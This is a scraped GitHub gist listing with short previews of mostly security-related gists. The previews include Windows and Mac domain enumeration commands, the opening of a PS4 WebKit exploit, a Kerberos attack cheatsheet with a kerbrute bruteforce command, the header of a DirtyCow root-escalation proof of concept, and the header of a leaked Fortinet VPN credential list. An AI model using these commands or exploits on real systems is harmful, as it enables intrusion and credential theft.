Skip to content

Instantly share code, notes, and snippets.

View 05t3's full-sized avatar
♻️
Learning, Un-learning, Re-learning

05t3 05t3

♻️
Learning, Un-learning, Re-learning
View GitHub Profile
@krzko
krzko / Domain Enumeration Commands
Created March 24, 2022 11:06 — forked from its-a-feature/Domain Enumeration Commands
Common Domain Enumeration commands in Windows, Mac, and LDAP
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users
@sleirsgoevy
sleirsgoevy / ps4.html
Created October 27, 2021 16:06
PS4 WebKit exploit on 9.00
<script>
var PAGE_SIZE = 16384;
var SIZEOF_CSS_FONT_FACE = 0xb8;
var HASHMAP_BUCKET = 208;
var STRING_OFFSET = 20;
var SPRAY_FONTS = 0x1000;
var GUESS_FONT = 0x200430000;
var NPAGES = 20;
var INVALID_POINTER = 0;
var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)
@rain-1
rain-1 / Raspberry Pi, Static HTTPS site with Docker and Nginx.md
Last active April 3, 2024 18:17
Raspberry Pi, Static HTTPS site with Docker and Nginx

Raspberry Pi, Static HTTPS site with Docker and Nginx

This tutorial is dated Oct 2021, if it's much further on than that this information might be out of date.

This is a guide on setting up a static HTTPS website on your raspberry pi using docker and nginx. The aim is to have this running on the raspberry pi and to be able to access it from a host computer on the same local network. You should already be able to ssh into your pi from your host computer and have raspberry pi OS set up.

Find your raspberry pi

@crypto-cypher
crypto-cypher / fortinet_victim_list_2021.txt
Last active February 7, 2023 23:46
Fortinet Victim List - "Hackers leak passwords for 500,000 Fortinet VPN accounts" #TrackThePlanet
This file has been truncated, but you can view the full file.
##### COURTESY
# @CuratedIntel
# https://curatedintel.org
##### BACKGROUND
# Initally shared on RAMP ransomware forum
# Last shared on Groove ransomware extortion website
# Publicized by Bleeping Computer, which led to this post being issued to help blue teamers
# https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/
@CMNatic
CMNatic / cloudSettings
Last active October 5, 2023 19:22
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
{"lastUpload":"2021-08-31T08:20:42.057Z","extensionVersion":"v3.4.3"}
@kenmori
kenmori / TwitterWithMarkDown.md
Last active April 20, 2023 18:27
How to write a Twitter link in Markdown

How to write a Twitter link in Markdown

Twitter URL


[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/bukotsunikki.svg?style=social&label=Follow%20%40bukotsunikki)](https://twitter.com/bukotsunikki)

author

@IanColdwater
IanColdwater / twittermute.txt
Last active April 22, 2024 17:26
Here are some terms to mute on Twitter to clean your timeline up a bit.
Mute these words in your settings here: https://twitter.com/settings/muted_keywords
ActivityTweet
generic_activity_highlights
generic_activity_momentsbreaking
RankedOrganicTweet
suggest_activity
suggest_activity_feed
suggest_activity_highlights
suggest_activity_tweet
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 22, 2024 18:43
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten